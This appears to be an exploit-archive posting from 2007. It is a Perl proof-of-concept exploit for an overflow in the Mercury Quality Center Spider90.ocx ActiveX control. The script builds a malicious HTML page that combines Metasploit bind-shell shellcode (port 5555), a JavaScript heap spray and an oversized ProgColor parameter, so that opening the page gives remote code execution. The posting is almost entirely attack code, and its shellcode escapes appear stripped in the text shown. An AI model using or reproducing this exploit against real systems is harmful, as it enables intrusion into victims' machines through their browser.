hpmercury-overflow.txt
Posted on 05 April 2007
#!/usr/bin/perl # POC exploit for Mercury Quality Center Spider90.ocx ProgColor Overflow # credit to Skylined, Trirat Puttaraksa, HDM Skape and the rest of the # metasploit crew. This exploit is just a cut and paste of thier code they # deserve the credit # Vulnerability found by Titon and Ri0t of Bastardlabs use strict; # win32_bind LPORT = 5555 - Metasploit my $shellcode = "xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45". "x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49". "x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d". "x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66". "x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61". "xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40". "x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32". "x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6". "x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09". "xf5xadx57xffxd6x53x53x53x53x53x43x53x43x53xffxd0". "x66x68x15xb3x66x53x89xe1x95x68xa4x1ax70xc7x57xff". "xd6x6ax10x51x55xffxd0x68xa4xadx2exe9x57xffxd6x53". "x55xffxd0x68xe5x49x86x49x57xffxd6x50x54x54x55xff". "xd0x93x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64". "x66x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89". "xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38xab". "xabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57x52x51". "x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53". "xffxd6x6axffxffx37xffxd0x8bx57xfcx83xc4x64xffxd6". "x52xffxd0x68xf0x8ax04x5fx53xffxd6xffxd0"; my $jscript = "<script> " . "shellcode = unescape("" . convert_shellcode($shellcode) .""); " . "bigblock = unescape("\%u9090\%u9090"); " . "headersize = 20; " . "slackspace = headersize+shellcode.length; " . "while (bigblock.length<slackspace) bigblock+=bigblock; " . "fillblock = bigblock.substring(0, slackspace); " . "block = bigblock.substring(0, bigblock.length-slackspace); " . "while(block.length+slackspace<0x40000) block = block+block+fillblock; " . "memory = new Array(); " . "for (i=0;i<350;i++) memory[i] = block + shellcode; " . "</script>"; my $header = "<html> " . "<head> " . "</head> " . $jscript . "<body> "; my $footer = "</body> " . "</html>"; my $body = "<OBJECT ID="MQC" CLASSID="CLSID:98c53984-8bf8-4d11-9b1c-c324fca9cade" CODEBASE="Spider90.ocx#Version=9,1,0,4353" WIDTH=100\% HEIGHT=100\%> " . "<PARAM NAME="ProgColor" value="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFFFFx0dx0dx0dx0d"> " . "</object> " . "</body> " . "</html>"; my $page = "xffxfe"; # magic number of M$ unicode file my $c; foreach $c (split //, ($header)) { $page = $page . $c . "x00"; } foreach $c (split //, ($body . $footer)) { $page = $page . $c . "x00"; } open (IE, ">", "exploit.html"); print IE $page; close IE; # This function copy from JSUnescape() code in Metasploit sub convert_shellcode { my $data = shift; my $mode = shift() || 'LE'; my $code = ''; # Encode the shellcode via %u sequences for JS's unescape() function my $idx = 0; # Pad to an even number of bytes if (length($data) % 2 != 0) { $data .= substr($data, -1, 1); } while ($idx < length($data) - 1) { my $c1 = ord(substr($data, $idx, 1)); my $c2 = ord(substr($data, $idx+1, 1)); if ($mode eq 'LE') { $code .= sprintf('%%u%.2x%.2x', $c2, $c1); } else { $code .= sprintf('%%u%.2x%.2x', $c1, $c2); } $idx += 2; } return $code; }
